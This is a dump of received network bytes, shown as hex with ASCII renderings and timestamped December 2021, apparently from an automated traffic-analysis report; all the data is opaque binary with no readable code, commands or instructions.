7d 43 cd 22 db 44 f5 8f ab bd d0 ab 27 fc cc 30 33 e0 8d 23 5b f7 78 6b e6 45 6c 23 06 c3 42 2e 55 0b af 52 06 8c c2 3a d1 47 75 e8 fd
                                                                                                  Data Ascii: F2)V,=vS~M5wE$T:_RdSp:)A1C`_2|^h,a^G""o[S.rq=:gmcYp3bVCf:}UVI/m D6'v1wPI{'zy4y}C"D'03#[xkEl#B.UR:Gu
                                                                                                  2021-12-14 15:13:05 UTC87INData Raw: 38 60 11 17 f7 e9 a8 76 51 ae 38 ec 8f b0 fc 0c 9e 5b ca 31 62 76 f6 c7 59 db df 9c 92 99 15 ce 1d 7e 69 bf 28 3f b5 f4 32 a6 0c f1 8f 3a eb 37 d9 5f 26 bf 51 d6 91 31 04 8b a4 cb ec aa 9d da ac f9 3f 88 5a be 3f d9 9d 33 bd 56 94 c2 d6 8d 05 a0 cb 8f 56 08 88 22 30 67 12 18 53 6d bb e4 9d c9 a4 f6 5f 29 6d f9 15 ca 92 17 ff 7c 1d 71 32 fb 77 de d7 90 37 95 64 ce df f1 58 49 e0 07 16 02 ba 6c 5e 5a c9 8c 5d 8b 2e 53 fd 43 15 a8 29 89 14 6c 1b b3 40 9a 40 b1 12 8e a8 b2 26 7f 86 d8 59 6a a6 8f 04 a7 ad 1c 24 b7 ae d2 61 2e c8 36 29 dd 55 dc 1c 3a 39 1e c8 0c 3e 3f 07 24 4e 1d 45 e2 95 f6 a7 b0 38 f9 f3 de 31 2c 51 b0 0f b4 61 78 60 08 fc cc 49 74 69 f3 fb e9 5c fb e6 d1 8c bd 29 0a 83 5b 65 79 4a 09 e6 25 12 ef 6c 38 50 46 c9 f8 14 30 ee 72 7d 2d 79 79 11
                                                                                                  Data Ascii: 8`vQ8[1bvY~i(?2:7_&Q1?Z?3VV"0gSm_)m|q2w7dXIl^Z].SC)l@@&Yj$a.6)U:9>?$NE81,Qax`Iti\)[eyJ%l8PF0r}-yy
                                                                                                  2021-12-14 15:13:05 UTC88INData Raw: ad 4c ad 56 26 cc 73 f7 ab fb 13 25 a6 42 48 9e 78 f5 e7 8f 00 78 2a 37 b0 d3 f8 9e 63 2d e8 40 9c 30 ce 89 a0 80 96 cc b3 98 c3 91 32 52 06 d5 dd 21 15 4c 48 94 ea 19 e3 c2 d3 50 8d 3e 5f dd fb 14 1d 3d 9d cc 02 eb 73 b8 fa 45 1d 11 29 52 93 53 25 51 72 9f fe af 83 9a 0d ae d0 40 14 f8 91 09 69 65 97 c7 a7 2b 22 23 fc e8 f7 bc e7 d4 1c 92 52 55 a8 5b 33 58 ae 4d f1 f2 5b 4e d9 e2 f2 24 cf 90 22 ad 22 fa 6f 92 5b 12 a4 9f a8 53 2e 72 fe 1b b1 de 7f 2e cf 1c 7f 65 c4 bb 1c 84 4c 63 c0 4c 18 c6 71 83 cf 33 5b 1e aa ea 4b da 7a bd 3c e1 e0 30 66 79 fc 5b 80 be 55 a8 9f 5e de 65 08 0f ea 9a 3e c9 d0 f0 cd 80 5d 33 e1 25 07 f9 94 d5 7b 8c 19 fd 0e 04 65 e9 ac 47 84 8a 79 fe 78 71 3e 83 bc 24 fd 9a 97 42 b8 e2 78 7d 45 15 af 82 c2 68 51 dd 76 d5 44 ee 82 cf 68
                                                                                                  Data Ascii: LV&s%BHxx*7c-@02R!LHP>_=sE)RS%Qr@ie+"#RU[3XM[N$""o[S.r.eLcLq3[Kz<0fy[U^e>]3%{eGyxq>$Bx}EhQvDh
                                                                                                  2021-12-14 15:13:05 UTC90INData Raw: e3 c9 3f 81 e2 6a 6c 00 1e f7 1a 52 5a 8d ea 0f d3 ca 24 82 a4 ab 65 6b d2 96 c1 10 70 58 48 ef 89 c5 06 44 a7 11 16 e0 90 ff 7e 47 b2 9c 99 8d b0 f7 86 c4 53 dd 2a 08 db e6 c7 5f ce 35 9e 97 8a 0d d0 0b 77 83 a6 89 03 b7 fd 22 bc 91 8f 07 2d fd ad f1 bf c6 57 32 d8 84 0a a8 8b b5 ce e2 9d 74 4b ac d3 2c fa 85 24 17 cc ee 0d b5 45 9b f3 ad fe 3a a8 69 83 6f 48 10 36 12 bd 56 3e a0 85 c9 fc a0 da aa e5 44 37 71 11 3c 2b 95 00 ea d1 0c 6a 29 f0 2e 08 75 bc 35 b4 77 7a 7e 02 a7 b7 dc 2f fc 33 bd 66 03 5f e2 c9 e9 89 55 8e ff 38 d7 dc a8 8d 17 e9 9b a8 5a 0c 89 a2 12 8e ab 99 1d 43 84 d2 27 52 cc fc 20 d8 61 16 0c f3 ae a9 a7 06 89 30 38 d3 4b a2 9c a1 11 84 bb 32 36 9d 1c 5e 1b c9 56 ec ac b1 b4 b8 0c 38 ed 21 ce 2f 5f dd cb b6 1a b7 67 87 d3 e0 0c 74 69 ed
                                                                                                  Data Ascii: ?jlRZ$ekpXHD~GS*_5w"-W2tK,$E:ioH6V>D7q<+j).u5wz~/3f_U8ZC'R a08K26^V8!/_gti
                                                                                                  2021-12-14 15:13:05 UTC91INData Raw: f5 38 ec ca 19 71 f2 58 5c 1c 8c a3 ca 23 75 b1 ba a9 64 5f b4 c9 0a 8e d5 fb 8a 48 c9 8f 82 34 a4 4d 04 96 0c be 52 43 6b 41 a9 a3 0e 6f 33 9d 29 40 8f 7e 32 6c ca b1 79 28 46 73 c1 ee 89 63 18 93 53 9d 30 d5 99 ca 57 0c df bb 8e b4 be 3c 3d bc c5 d5 58 39 44 5c 8d c9 5e e9 d3 d5 69 ad 4d 19 d5 ed 3e 2c 7d 9d cc 1a c8 1a 2e fb 4f 0a 07 31 7f 1d 7b 25 51 fd cf 33 af 82 8d b7 e1 c2 40 14 f2 be 1a 43 64 96 d4 a2 41 e1 0b 43 ee 84 84 f3 c2 05 98 2a 35 86 54 13 52 87 09 f3 e1 45 4a 8d c7 65 25 cf 94 4a 6f 33 f1 43 4b 4e 14 74 06 94 40 3a 62 91 da b6 fe 7b 3e c2 34 29 74 d6 a2 36 69 8b 63 c6 5b 16 c6 6d 83 cf 3f 59 1e c8 dd 58 d6 1f bd 7e e3 e6 2c 64 78 99 0c 8f 30 e8 97 05 4f cb 7c 2e 65 fc 8b 39 c9 db 70 d6 21 66 22 e4 30 aa 27 91 c4 71 2c a0 fd 01 15 61 5a
                                                                                                  Data Ascii: 8qX\#ud_H4MRCkAo3)@~2ly(FscS0W<=X9D\^iM>,}.O1{%Q3@CdAC*5TREJe%Jo3CKNt@:b{>4)t6ic[m?YX~,dx0O|.e9p!f"0'q,aZ
                                                                                                  2021-12-14 15:13:05 UTC92INData Raw: 7b 86 e3 77 4c f2 f3 fe 00 d9 c6 f6 f1 c0 42 42 9e f7 18 65 44 59 f7 63 7d ea 6e 36 d2 52 88 d4 fb 78 01 e5 4f 57 84 f3 6e 52 97 20 f7 10 20 1a a7 5b 05 a9 c9 22 e0 a2 a9 51 6b c3 e3 5b 04 58 5a 4b ef 9e cb 86 40 a3 05 01 e1 99 f8 5c 38 a4 10 a0 9e b4 e7 20 c3 a7 c9 31 0b df e0 ef 8d c0 97 89 8c 9d 88 ba 02 63 96 96 1f 2d b7 f7 50 f9 98 9e 06 41 e2 26 3a a3 07 cd 85 c9 8f 23 18 8e b6 c0 e2 93 72 de 0e 6f 2f f0 84 96 56 dd ee 0b ac 52 8f df aa 00 39 a9 cc a9 69 64 58 26 3a 77 43 3a 2a e9 44 fb a1 f2 b0 f7 4e 2c 08 51 16 e6 9b 7a fd 76 37 60 3d e4 29 10 d3 bc 8b bf 61 f6 81 02 a7 a7 dc 14 07 0a 12 6d 2f 5d c9 9d e1 92 d0 43 d3 3e d0 bb 2e 97 04 e2 8a bd 47 c4 fa b6 3e 87 92 c9 55 41 84 c7 5a 60 c6 fc 2a af b2 19 f2 f6 80 d5 7d 15 81 2b 39 c4 47 b3 89 31 26
                                                                                                  Data Ascii: {wLBBeDYc}n6RxOWnR ["Qk[XZK@\8 1c-PA&:#ro/VR9idX&:wC:*DN,Qzv7`=)am/]C>.G>UAZ`*}+9G1&
                                                                                                  2021-12-14 15:13:05 UTC93INData Raw: da c3 f6 94 3c bd 5b 67 fd e6 92 d7 74 37 64 19 f6 de b2 a5 2f a2 d5 53 d0 88 af 5e 47 58 b7 4a f6 27 fe 86 8d f6 ca 1f 61 da 97 59 1c 8a 89 d8 3e 17 b0 a8 b3 e4 77 2a d3 3a 8d ab 45 88 48 c3 41 ed 84 b4 59 1d 83 1f bc 51 38 d1 56 ba ad 94 d4 33 ac 52 52 8a 6a 2e 6b b7 01 6a 2c 5e 62 c1 f8 88 77 32 c3 7a 31 31 c4 8d e2 41 94 cc b7 b7 00 ae 30 54 1f c2 c4 54 28 35 91 9e c2 5d e3 b9 05 41 89 49 0f 45 80 c1 35 7d 9b a3 96 c2 32 bc f8 34 d0 14 38 5b 0a e0 5e b1 70 e4 37 c0 eb 9c ba cb 1d 09 31 da 04 31 43 6e 84 cf a6 41 e2 0b 93 ec 84 84 cd 00 12 8b 3e 0e 38 58 33 54 a0 1f e0 f5 79 60 99 ef f9 fa ec b7 71 51 22 fa 61 88 43 17 52 11 82 53 ae 58 51 cf b1 d8 53 90 c3 34 3c 41 d2 a2 19 d7 b2 63 c0 42 c1 b5 5e 86 f6 bf 4b 16 d9 c3 4b a1 ac 95 7c e7 6e 8d 60 a7 98
                                                                                                  Data Ascii: <[gt7d/S^GXJ'aY>w*:EHAYQ8V3RRj.kj,^bw2z11A0TT(5]AIE5}248[^p711CnA>8X3Ty`qQ"aCRSXQS4<AcB^KK|n`
                                                                                                  2021-12-14 15:13:05 UTC95INData Raw: 19 7e 1b ed 2a ae dc 94 79 da 44 e3 64 cf ac c9 59 c6 15 5c 38 2e 83 71 11 cd cf 9b 17 ae 38 2a 64 2e b5 62 25 e3 73 43 d3 f3 fa 08 db 27 2c e5 e8 23 64 8f fa 14 43 3a a6 e0 9d 74 c6 79 11 d4 7e 42 4a 94 12 12 e3 c9 0a 93 f5 00 4d 8e 21 fd 0d 89 5f bc 48 01 eb 61 08 e0 a2 bc 70 63 ac a6 59 04 52 fa 71 80 64 dc 8b 49 b4 1d 06 ff 8f d5 f6 51 a4 10 a0 9c be 99 10 d7 59 c0 2d 1c ff 98 28 5f c4 9d e0 f7 9b 04 cb 11 6e 86 b3 2c 90 b5 fd 25 b4 f5 f5 0e 3b e1 1d d6 b2 c0 4e c1 fd 8d 22 01 9a b9 d3 25 f9 6b da 80 d2 52 99 90 be 35 d1 ff 06 97 7b 9d db ba 91 56 a0 cb 8f 58 5d 81 24 2b 7f 3d 0a a4 92 4e 94 cc d8 ab fc 68 0d 5d 16 19 ce e0 00 ec 75 30 7d 2c ef 12 0d d5 bc 33 d1 0d f4 41 08 81 a7 c1 01 1c 3c d2 58 2d 5d c3 e3 87 89 2e 48 d9 29 dd bf ff 9e 19 f9 84 bd
                                                                                                  Data Ascii: ~*yDdY\8.q8*d.b%sC',#dC:ty~BJM!_HapcYRqdIQY-(_n,%;N"%kR5{VX]$+=Nh]u0},3A<X-].H)
                                                                                                  2021-12-14 15:13:05 UTC96INData Raw: 65 9b e8 5b 34 ab bd f8 2b b2 9a 8a cd 1b 8d 01 16 7a c2 af 3e e8 91 9b 8e af 98 4e 40 a8 18 8d 07 87 ed d8 d4 f7 96 54 14 a4 66 d7 cc 81 d5 5f de a2 0e ec 81 c7 a5 29 c7 54 20 d2 f5 5b 5e 46 40 9b 4b dc 25 e2 fb 5c ec ca 17 79 a1 4c 58 1c 8e c0 23 22 55 ba 90 a9 f7 47 29 c8 4c 84 ab c7 8a 48 c3 87 ef ac b2 4d 0e 8f 0a b9 2b cd da 40 ad aa a8 57 24 a6 4c 6d 84 56 0d 6a a5 06 0b 0e 4e 60 d9 82 9e 64 12 c8 56 bd cf 3b 8b db 77 9d e4 99 9d b0 a9 43 05 0d c4 df 28 28 4d 35 41 c2 59 e5 c0 dd 3c 69 4d 19 db d1 1e 35 6e af cf 08 86 32 ba fa 4f 0c 14 38 5d 1f 7e 0d e3 71 e4 35 aa ab 11 bb c1 c9 6d 1f da 1d 33 43 62 e4 e1 a7 50 e0 59 f2 e8 ac 0d e4 d4 1c a7 33 0e b9 5b 33 54 f5 2f f1 f2 5b 22 9b f8 8e c5 cf 92 5d 64 27 f4 6f b3 32 14 72 16 ff b1 2e 70 81 e1 b1 de
                                                                                                  Data Ascii: e[4+z>N@Tf_)T [^F@K%\yLX#"UG)LHM+@W$LmVjN`dV;wC((M5AY<iM5n2O8]~q5m3CbPY3[3T/["]d'o2r.p
                                                                                                  2021-12-14 15:13:05 UTC97INData Raw: 63 b7 89 c0 2f 89 ed 9e 05 54 27 4d b6 60 93 5d 10 29 fe e3 0d ce 62 c6 4e fc e6 8a 76 f0 6a 03 3e 60 ca 09 11 1b ed 20 86 dc 91 63 2e 2a a2 6c c9 a1 92 a3 cd 04 52 37 15 5f 75 00 ce c5 e8 11 82 2e 2d 55 c4 a6 fc 87 e3 75 3a 80 e0 fa 02 a2 34 43 e7 e2 25 5f 8d f4 0b 72 50 40 e8 63 7f cc 62 13 aa 07 58 d0 f1 61 1a f0 c6 2c 95 f6 74 84 8d 0d fd 1d 55 31 4e 5b 0f d7 dc 1b e5 a2 ab 64 75 3d 93 77 0f 5a e6 38 5b 8e dd 8d 49 be 02 12 f3 8b eb 63 af a5 3c a5 95 a3 f3 24 c4 5c d4 c5 0c df e0 c0 7a 3a 90 39 9c 99 02 b2 79 61 97 b4 77 50 b5 fd 29 a2 85 97 1f 3e eb 20 e5 a9 2f 41 82 c0 87 4d 76 89 b5 ce ed 85 66 db 91 dd 24 0d 93 92 34 de ec 7e 0b 57 9e dd b7 e4 29 a7 cb 94 7b 5a 74 23 16 72 45 2d a3 92 55 fe bf d0 55 f7 62 24 50 02 2c c9 6e ff 13 59 03 62 26 d4 38
                                                                                                  Data Ascii: c/T'M`])bNvj>` c.*lR7_u.-Uu:4C%_rP@cbXa,tU1N[du=wZ8[Ic<$\z:9yawP)> /AMvf$4~W){Zt#rE-UUb$P,nYb&8
                                                                                                  2021-12-14 15:13:05 UTC98INData Raw: cc 3a 83 70 95 76 e8 f9 37 77 74 93 e3 83 92 5b ab d6 41 d3 6f 29 50 16 9b 18 d2 dd e3 bd 02 75 33 e5 38 75 39 94 dc 69 c5 77 c2 0d 13 62 4b 9d f7 8d 74 78 d0 01 91 3b bb d2 d2 13 63 49 e7 92 f1 48 7d 3e 69 af 82 c6 a9 5c f5 20 c2 48 dc 1e b4 ae 2e aa 03 ce c3 42 74 cc 87 25 4e 8c 6d e6 a0 41 73 28 22 6e 4a 32 a1 22 b0 5a 01 85 a8 b9 ef 47 71 f4 d9 e9 20 08 16 f1 ec bf 6e bb cd cf a9 90 7e 40 29 76 c3 45 d7 8b 93 2f 6c 18 53 5a 84 97 9a 7d d8 34 82 e5 87 e1 ab 0a 6b b3 53 ec 64 ae 03 fa fc 17 f2 60 ce 8e 02 e7 a6 b7 f7 14 81 28 73 c5 4c d2 1a ed 24 9d c1 94 71 c7 d5 8f 4a cd be e3 48 c5 1f a8 2d 2a 5e 5e be d7 d5 16 18 b6 c6 2a 5c 32 d2 f1 87 e3 75 42 e2 ee fa 00 c7 b6 40 cb ea 3e 4e 9e f9 14 69 ab 5e cd 9f 55 e5 50 47 3a 85 a5 d7 d1 6d 20 e0 c3 8d 84 f3
                                                                                                  Data Ascii: :pv7wt[Ao)Pu38u9iwbKtx;cIH}>i\ H.Bt%NmAs("nJ2"ZGq n~@)vE/lSZ}4kSd`(sL$qJH-*^^*\2uB@>Ni^UPG:m
                                                                                                  2021-12-14 15:13:05 UTC99INData Raw: 31 56 01 39 ff a7 2b f6 19 e9 8a a8 22 2d 04 b7 18 91 bf a2 50 41 95 dd 4c 66 32 fd 17 aa af 6d 02 f6 ac d6 04 ac 89 34 23 c8 5b a0 9d 3b 28 1d a0 cc 3d 13 06 58 77 0f 44 e8 b9 99 81 ac 21 70 13 cf 34 32 4c 58 03 9a 0a b1 67 66 7d e6 62 f3 7d eb fa e9 5e 6a 43 cf 8b bf 43 c4 9e a5 60 21 df 1f e4 5f 1c 95 a7 3c 3f c8 45 4f 92 18 34 61 78 29 4f 59 15 af 2c c3 71 86 f0 53 7e 37 94 27 1d aa d0 c1 7e f1 40 e1 10 cc 7d 89 42 93 29 84 30 ac 94 da 11 7a ff 6d bf 30 fb ef 44 6f 78 bb 1d da dd 0e b3 a8 06 31 4a 20 d6 78 f4 09 0e eb e8 2a b0 bb 1e 8f c3 5b 23 8c 90 f4 18 a1 9f 8a 15 1e 92 02 fe 70 c5 bb 3c 94 88 64 8f 87 a3 2a 4b a8 1f 84 ea 95 c4 da d2 f9 89 43 f2 5b 4b fd e5 4c c8 65 2e bf 19 e1 f7 aa b1 d7 cc 52 59 d2 9a f8 50 47 44 b3 55 e1 34 f0 86 93 e9 d4 ed
                                                                                                  Data Ascii: 1V9+"-PALf2m4#[;(=XwD!p42LXgf}b}^jCC`!_<?EO4ax)OY,qS~7'~@}B)0zm0Dox1J x*[#p<d*KC[KLe.RYPGDU4
                                                                                                  2021-12-14 15:13:05 UTC101INData Raw: 61 14 72 11 88 51 55 7e 84 cb b5 dd 00 21 c3 34 3e 71 ab 21 1c ff 80 45 c3 33 04 b4 4f 85 c4 12 6c 1f df c3 4e dc fe 22 16 cb 72 38 77 77 38 72 d9 be 5f 8a cc 59 da 69 36 5f ed f5 9d d8 d5 eb c7 1e 71 8b 8f fd 77 33 82 bf 4f ee 72 81 f8 04 6f 41 97 93 9d 8b 79 f8 1d 89 38 8a d7 87 ec 9c 4b da b8 e2 63 4f 3d c5 80 82 c6 79 87 f5 31 c5 37 68 80 b4 a4 22 a8 08 d9 a5 77 74 e0 8b 0e 46 f5 76 88 d5 45 6c 28 7f 79 49 f0 4e 27 88 02 10 8d 0b bc e6 6b 73 e1 ba be 28 15 e2 2c c7 9c 69 b8 a0 c1 a8 92 7a 58 25 6b e8 5c 23 8a bf 25 6f 2b ec 5e 84 9a b7 a5 c2 e4 82 ed 88 1d fa 5d 6f b5 4b 95 03 93 03 fe e2 33 f5 48 e8 96 fc e0 f9 39 f2 6a 18 52 71 9f 5e 14 1a ed 26 8c e5 07 7b d0 21 83 4e 5c a4 ef 42 c1 0d 28 bf 06 5a 7f 39 0b d8 16 16 bd 3c 2d 1f ae a3 4a 8c f0 75 62
                                                                                                  Data Ascii: arQU~!4>q!E3OlN"r8ww8r_Yi6_qw3OroAy8KcO=y17h"wtFvEl(yIN'ks(,izX%k\#%o+^]oK3H9jRq^&{!N\B(Z9<-Jub
                                                                                                  2021-12-14 15:13:05 UTC102INData Raw: 03 12 68 26 b6 c4 ea 1f 60 37 f2 22 4f 7f bc 35 b4 7e e5 52 04 a7 a7 cc 11 f3 33 91 6f 38 4e cf 8c fa 8d 31 55 01 39 ff aa 02 88 2f 64 77 53 b2 f0 04 b7 12 9d 9a b5 55 f3 87 d8 53 ac cc fc 2a b3 be 10 34 53 af d2 6b 06 98 32 36 dd b3 b2 b4 34 3a 63 9e 33 3c 3b 34 76 0f 1f 45 f7 b6 a6 a3 b0 23 73 0d 20 30 01 51 a4 01 d9 cd b2 60 0e f5 ff 05 65 14 38 ea ef 47 7e af dd a2 b4 72 c1 8b 5b 61 1e cf 16 ea 37 16 94 b6 3e 4f 53 b9 4e b4 13 ec 09 72 24 51 4e 13 d4 1d c7 68 7c d9 e5 6c 35 e5 3f 06 c5 7d ae f8 f9 5f f9 bb c0 67 8b 41 8c 2f 7f 2e 8b 7d d9 46 61 f9 6f c0 28 d2 76 42 00 f4 af 05 bf 7d d4 0b 75 12 36 55 35 d3 69 e3 13 02 eb e8 2a a6 bb 1e 93 c3 5b 23 9c 30 4f b7 9a 03 88 04 11 9b 08 6f d8 e9 b4 34 f0 93 76 89 83 8b 50 54 b1 e1 9a d5 91 c3 a1 cd fd 96 57
                                                                                                  Data Ascii: h&`7"O5~R3o8N1U9/dwSUS*4Sk264:c3<;4vE#s 0Q`e8G~r[a7>OSNr$QNh|l5?}_gA/.}Fao(vB}u6U5i*[#0Oo4vPTW
                                                                                                  2021-12-14 15:13:05 UTC103INData Raw: 51 c6 2c fe 97 8e 83 e5 d0 2f 73 39 26 97 46 20 41 82 09 e2 f6 4e 42 67 ee df 30 cd e9 57 67 22 fe 6c 8d 4d 9a c5 7f 2b 53 2e 7a 9a d0 a2 da 7b 2e c6 2b 2e 99 c5 9d 17 c7 82 9c 3f b7 00 a0 5c 85 cf 28 4e 09 d3 2b 48 f6 59 97 07 ed e1 3a 73 7f f4 11 83 be 5b ef 55 5e de 65 4a 4c 93 8b 35 d8 d1 37 e8 94 76 33 eb 31 62 5b 3d d5 7f 31 69 e5 1c 00 6f 5a 90 f7 8a 74 78 d0 28 b8 45 8d b9 2d e8 86 cc e6 92 e2 79 72 37 d3 b0 d2 5a 70 4b ea 7a 48 4d fc 9c 28 a7 37 b7 97 d8 dc a6 1a 49 8d 22 40 ee 71 f4 a4 45 7d 26 33 90 43 02 48 21 e7 5d 07 86 d1 a9 c3 6f ec eb d5 e3 3e 0d 87 59 c0 b6 63 a7 a3 c5 a8 81 7e 40 db 77 e7 4b 2b f1 b1 24 6f 34 ca 73 1e 9f b6 af d4 22 ed 44 99 1f a0 39 68 a7 4f 91 67 ab 1c f5 1d 1f d2 49 c4 ef f2 e7 8a be f2 11 1e 29 73 cb 5e 57 19 ed 2a
                                                                                                  Data Ascii: Q,/s9&F ANBg0Wg"lM+S.z{.+.?\(N+HY:s[U^eJL57v31b[=1ioZtx(E-yr7ZpKzHM(7I"@qE}&3CH!]o>Yc~@wK+$o4s"D9hOgI)s^W*
                                                                                                  2021-12-14 15:13:05 UTC104INData Raw: 86 40 3e f1 e4 0a b9 d8 29 f5 72 e1 2f b1 c3 85 6f 44 95 00 c4 70 7e 32 a2 83 40 94 3d d8 ab fc 51 05 68 0f 14 f7 99 1c 12 72 31 6d 3e b4 41 39 d7 bc 31 a8 52 bf 5c 11 af b6 db 0f 12 24 43 6d 03 4c ca dc 90 92 2f 42 fb 26 93 63 29 8d 17 f7 9d bf 45 da 15 bf 0d ad 54 b0 79 4d 86 db 57 1c 18 fd 3b a3 b2 32 1f ff ac c3 63 1f 77 35 05 d1 5b a0 9d 21 2a 10 bb 23 34 20 04 a4 0d 33 57 ea c6 bb a4 b0 36 62 04 ad a0 2f 5d ac 0e a9 10 a0 68 08 e9 e8 11 88 13 14 f1 eb 23 7b 50 dc 8a b3 4c d2 8b 5b 70 05 d4 03 18 25 3c 98 a4 68 45 3f 67 4e 98 0b f1 79 6f 2d 51 5b 18 b0 23 38 69 54 e6 7c 3e 4e f3 28 1c ae d7 fe 83 e8 41 eb ac f8 12 9a 47 93 27 9e 3c af 6a ca 35 70 d8 91 c5 12 ea ed 3b 0e ff b9 19 d9 bb 49 09 7f 07 31 67 20 db 78 f4 04 09 08 17 07 90 b5 61 f2 40 59 27
                                                                                                  Data Ascii: @>)r/oDp~2@=Qhr1m>A91R\$CmL/B&c)ETyMW;2cw5[!*#4 3W6b/]h#{PL[p%<hE?gNyo-Q[#8iT|>N(AG'<j5p;I1g xa@Y'
                                                                                                  2021-12-14 15:13:05 UTC106INData Raw: 9d cc 02 be 11 bb fa 4b 13 0d 2b 57 1c 6b 2d 4e 61 1a 32 83 97 9b b9 c9 dc 5d c2 da 0f 30 43 6e ea da a4 50 ee 3c ee ff 8c 82 f4 dc 0d 75 39 0a 9c 5a 3b 7a 0d 0b f3 f8 5a 44 8a e7 f3 35 c7 8c a7 67 0e f5 68 93 54 c2 5a 9b 80 53 24 63 81 d4 b8 cd 73 3f d3 3c 25 68 3a b0 32 eb 8f 60 c8 57 0b 63 67 bd ce 39 40 6b c5 d4 49 de 6f 85 6f eb e0 2b 7f 61 71 1c ae b3 5c 88 c7 8a f6 e4 22 4e e2 90 29 cb dd e1 d1 07 6b 28 1f 26 50 3d 9c c4 78 0a e8 f1 13 17 67 4b 85 e0 9b 81 87 fd 2f b6 37 9c a0 69 94 9d 41 cd 8d ee 6b 77 3e d4 a7 9d d3 87 5d d9 3d c5 42 f3 c0 8f af 2e aa 14 c7 d9 b4 75 f1 85 3b b4 f0 52 e9 a4 46 e2 95 34 b4 55 f4 4c 24 90 49 15 8e d5 a7 e6 5d 8b e8 f9 ec 03 b8 f3 e3 c8 b6 78 b1 a8 3f a9 bc 76 5d ab c1 d1 63 77 8b bf 25 76 23 d4 5b 95 95 a9 af 3c 39
                                                                                                  Data Ascii: K+Wk-Na2]0CnP<u9Z;zZD5ghTZS$cs?<%h:2`Wcg9@kIoo+aq\"N)k(&P=xgK/7iAkw>]=B.u;RF4UL$I]x?v]cw%v#[<9
                                                                                                  2021-12-14 15:13:05 UTC107INData Raw: 6a 95 c5 0a 2d b7 f9 32 a6 f5 03 0e 3b e1 36 8f 18 d3 40 a4 c5 87 4c 2b db fe c2 f5 fc 4d dc 96 d2 e0 37 92 be 3f df 95 03 be 56 9a c4 a0 94 2d cd 5b 87 7e 46 ac 25 55 de 50 3e ac 81 4c fc cf 75 a9 f6 44 35 7f 00 7b 49 93 00 e6 7e 0c 65 2c e2 b6 d8 d6 bc 34 96 52 f7 41 08 a5 cd c4 06 0d 36 d2 f0 2d 5d c3 00 7a 8b 2e 43 e9 10 4f a9 29 87 3b ec 9c a6 93 a9 06 a6 1a f3 bb b0 55 45 86 c9 57 64 a6 26 8c b2 7b 9b 27 f7 ac d3 16 16 88 34 2d d5 36 bd 99 3b 3d 11 ad 5d ac 3d 0d 50 2a 1d 3e e6 bc b5 a1 b2 49 65 12 de 35 3b 4c a2 b5 d9 41 b3 60 02 de e2 77 78 13 38 ff e0 4e 1a c1 de 8e b5 74 d6 89 85 43 0f b0 07 e7 24 14 fb 21 3a 50 48 51 25 a5 67 10 8d 83 fb 5d 62 27 af 3d cc 40 40 f1 7f 64 eb ef 3f 36 ac fe ef e4 f3 40 eb a8 c6 67 88 47 93 38 37 2e a7 6a 13 3c 6f
                                                                                                  Data Ascii: j-2;6@L+M7?V-[~F%UP>LuD5{I~e,4RA6-]z.CO);UEWd&{'4-6;=]=P*>Ie5;LA`wx8NtC$!:PHQ%g]b'=@@d?6@gG87.j<o
                                                                                                  2021-12-14 15:13:05 UTC108INData Raw: 26 d3 07 f4 46 96 cd 15 8e b4 bb 24 44 1b ec 7d 52 2a 44 4f 8a ea bd e5 c2 df 57 04 4a 19 df fa 0a 21 69 b7 6f 08 c3 38 ae d2 a5 08 14 3e 48 91 7d 25 51 71 f7 37 be 87 88 ad 4d ec 41 14 f3 91 20 47 70 83 d1 b2 78 42 23 fc e6 83 96 cd 3f 12 8b 3e 30 1a 5e 33 52 87 1d e7 e6 46 70 3e ef f3 2e e9 b9 03 61 36 d2 87 9f 4a 12 64 9d 85 53 2e 71 91 df a5 f6 d8 3f c2 3e 2e 4f 29 b5 1e f9 9c ee c7 48 1f b4 5b 95 db 11 e9 16 d9 df 61 cb 70 95 76 ef e8 2e 5f 93 8b 1d 84 a9 d2 87 df 5c df 7c 24 5f ec 8c 1c 37 d1 e1 c6 ad 65 37 f5 33 68 1c 37 d5 7f 31 5e 56 0f 04 65 67 96 c3 bc 8d 6d d4 ef be 3e 85 ae a0 eb 9c 41 cc 86 f6 6c 57 9d c5 af 88 d2 51 ac f1 31 d2 52 69 87 b4 ae 2f be 1f c5 e2 1f 75 e0 87 0a fd f1 7e ed 88 fd 6c 22 24 54 2c d1 a0 dc 9b 47 2e 77 d1 b6 e8 51 f8
                                                                                                  Data Ascii: &F$D}R*DOWJ!io8>H}%Qq7MA GpxB#?>0^3RFp>.a6JdS.q?>.O)H[apv._\|$_7e73h71^Vegm>AlWQ1Ri/u~l"$T,G.wQ
                                                                                                  2021-12-14 15:13:05 UTC109INData Raw: 23 8f 43 a1 7e 8a f3 9a e4 65 5c cb 97 a7 8d ba de de d1 59 cc 54 bb f1 f7 cd 30 4d 96 8f 97 b1 5d c3 02 65 f8 42 04 2c bd a2 0f 8e 9c 8f 08 2a e6 5e 67 b5 d1 4a 86 33 8b 22 0d e4 03 c6 f3 9c 0c 52 81 d8 37 db b5 be 3f d7 e5 d3 95 47 8f b4 7b fe 3a a8 f1 fc 81 b3 75 fc 2c 60 43 4b 9d 92 44 fa 8c d6 ba e7 3b 1d 7b 07 15 89 c6 00 ec 79 c1 48 c9 e0 3a 26 fc bb 1f be 61 f6 00 66 a7 b6 c8 07 0d 32 90 6c 2f 5d c2 8c eb 8b 16 42 ff 38 df a8 29 8d 17 e8 8a ac 4f da 04 b7 56 8e aa b1 7f 40 84 d8 3d 72 cc fc 2d a5 ad 16 0c f7 ac d2 69 06 89 34 a2 d6 4d b3 80 3b 39 18 18 33 3c 3f 01 5a 0c 1f 45 e8 bd b5 a7 b0 32 75 aa df 31 2d c7 a6 02 b6 49 b1 60 08 ee e0 0c 76 12 38 fb e9 43 45 58 dc 7b bd 52 c1 6f 5b 61 1c d5 84 cd 24 10 95 b4 31 23 ee 47 4f 92 1c e8 63 7a 31 79
                                                                                                  Data Ascii: #C~e\YT0M]eB,*^gJ3"R7?G{:u,`CKD;{yH:&af2l/]B8)OV@=r-i4M;93<?ZE2u1-I`v8CEX{Ro[a$1#GOcz1y
